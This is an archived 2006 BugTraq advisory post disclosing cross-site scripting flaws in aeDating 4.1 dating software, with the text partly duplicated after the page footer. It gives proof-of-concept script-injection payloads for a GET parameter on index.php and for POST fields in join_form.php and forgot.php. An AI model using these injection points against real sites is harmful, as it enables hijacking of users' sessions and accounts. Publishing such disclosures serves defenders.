BugTraq
Back to list
|
Post reply
aeDating 4.1 XSS
Jun 22 2006 05:23PM
securityconnection gmail com
Product of AEwebworks Dating Software
http://www.aewebworks.com/
---------------------------
Cross Site Scripting (XSS)
---------------------------
http://target.xx:80/index.php?Sex="><script>alert(/Elipsis+Security+Test
/)</script>&Mode=last
^"G4" Template work^
---
POST /join_form.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 1685
page=1&ID=1&ProfileType="><script>alert(/Elipsis+Security+Test/)</script
>&NickName=1&RealName=1&Sex=female&Country=0&City=1&zip=1&Children=0&Whe
reChildren=
---
POST /forgot.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 65
Email="><script>alert(/Elipsis+Security+Test/)</script>
-----------------
Ellipsis Security
http://www.ellsec.org
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
http://www.aewebworks.com/
---------------------------
Cross Site Scripting (XSS)
---------------------------
http://target.xx:80/index.php?Sex="><script>alert(/Elipsis+Security+Test
/)</script>&Mode=last
^"G4" Template work^
---
POST /join_form.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 1685
page=1&ID=1&ProfileType="><script>alert(/Elipsis+Security+Test/)</script
>&NickName=1&RealName=1&Sex=female&Country=0&City=1&zip=1&Children=0&Whe
reChildren=
---
POST /forgot.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: target.xx
Content-Length: 65
Email="><script>alert(/Elipsis+Security+Test/)</script>
-----------------
Ellipsis Security
http://www.ellsec.org
[ reply ]